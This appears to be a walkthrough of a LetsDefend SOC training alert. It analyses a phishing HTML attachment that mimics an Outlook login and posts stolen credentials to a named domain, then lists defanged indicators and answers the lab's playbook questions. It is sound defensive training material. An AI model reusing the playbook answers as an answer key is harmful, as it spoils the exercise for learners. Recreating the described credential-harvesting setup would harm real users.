Lets Defend — Password Stealer Detected
SOC143 — Password Stealer Detected
LetsDefend
LetsDefend is a platform for practical training for blue team members. You can improve your skills in log analysis, incident handling, malware analysis and endpoint analysis.
SOC143 — Password Stealer Detected
Today we will analyze a password stealer used in a real cyber attack. Password stealers are a type of malware that steals account information.
Monitoring
Our investigation start at the Monitoring page which simulates a real working SOC environment. More details about the incident can be found here. Looking at the details, we can see the source address, SMTP address and more. Our next step is to copy the sender address and look for it in our mailbox.
Mailbox
By searching for the source address in the mailbox, we find the copy of the email that generated the alert.
We can extract important information found in the email, that could be useful in the future:
- Subject: .
- Sender: bill@microsoft[.]com
- Recipient(s): ellie@letsdefend[.]io
- Attachment(s): bd05664f01205fa90774f42468a8743a.zip
Next, we will download the attachment and unzip it in a safe environment. In our case, we are using REMnux (https://remnux.org).
After unzipping the attachment, we found one html file:
Generating MD5
By using md5sum, a tool built-in in REMnux, we are calculating the hash of the file in the attachment. Hashes are useful for positively identifying a malware. The malicious software is run through a hashing program that produces a unique hash that identifies that malware ( a sort of fingerprint).
Virus Total
Next, we perform a hash search on VirusTotal (VT). VT allows you to search through their dataset in order to identify files that match certain criteria. To search for a file that has a given MD5, just type in the hash under consideration in the main search box.
According to VT, the file is flagged malicious. At the time of our scan, the result reports 5 antivirus engines claiming the HTML file is malicious.
Dissecting HTML File
The user is prompted to enter his credentials on a fake Outlook login page by opening the HTML file. The name of the file, shown below, suggests that the actor was targeting the user.
As seen below, attempting to enter credentials in the fake login panel will establish a network communication to the domain tecyardit[.]com. The credentials are sent as a POST request to the URI /post.php
According to VT, the URI is flagged malicious. At the time of our scan, the result reports 7 antivirus engines claiming the URI is malicious.
URLscan is a website scanner written by Johannes Gilger, focusing on analyzing all possible details about any established HTTP connection, site content, relations with other sites and much more.
In our case, the site seems to be unreachable.
ViewDNS is an online source for DNS related tools. The tool provided by ViewDNS allow us to gather a large amount of data about a given website or IP address.
In the figure below, we can see the IP history of the malicious domain.
According to VT, the IP is flagged malicious. At the time of our scan, the result reports 1 antivirus engine claiming the IP is malicious.
Indicators of Compromise
- 58c45547bccce5eb16d84bae13eb0c2813ffe03e34eae622b65468a6b289ca37
- 109[.]68[.]33[.]64
- 180[.]76[.]101[.]229
- tecyardit[.]com
- tecyardit[.]com/wp-content/card/2/post.php
Log Management
We will now use the Log Management page and check if the URL/IPs were accessed.
No log entry were found. It means that the user didn’t enter his credentials.
Case Management Detail
Now we are packed with enough information to conlude that the alert is a true positive and that an incident should be open.
We can answer the questions of the playbook with the information we’ve collected during our analysis.
Playbook
A security playbook is a list of required steps and actions needed to successfully respond to any incident or threat. Playbooks provide a step-by-step approach to orchestration, helping security teams to establish standardized incident response processes and ensuring the steps are followed in compliance with regulatory frameworks.
- When was it sent?
April 26, 2021, 11:03 PM - What is the email’s SMTP address?
180[.]76[.]101[.]229 - What is the sender address?
bill@microsoft[.]com - What is the recipient address?
ellie@letsdefend.io - Is the mail content suspicious?
Yes. - Are there any attachment?
Yes.
References
https://whois.domaintools.com/tecyardit.com
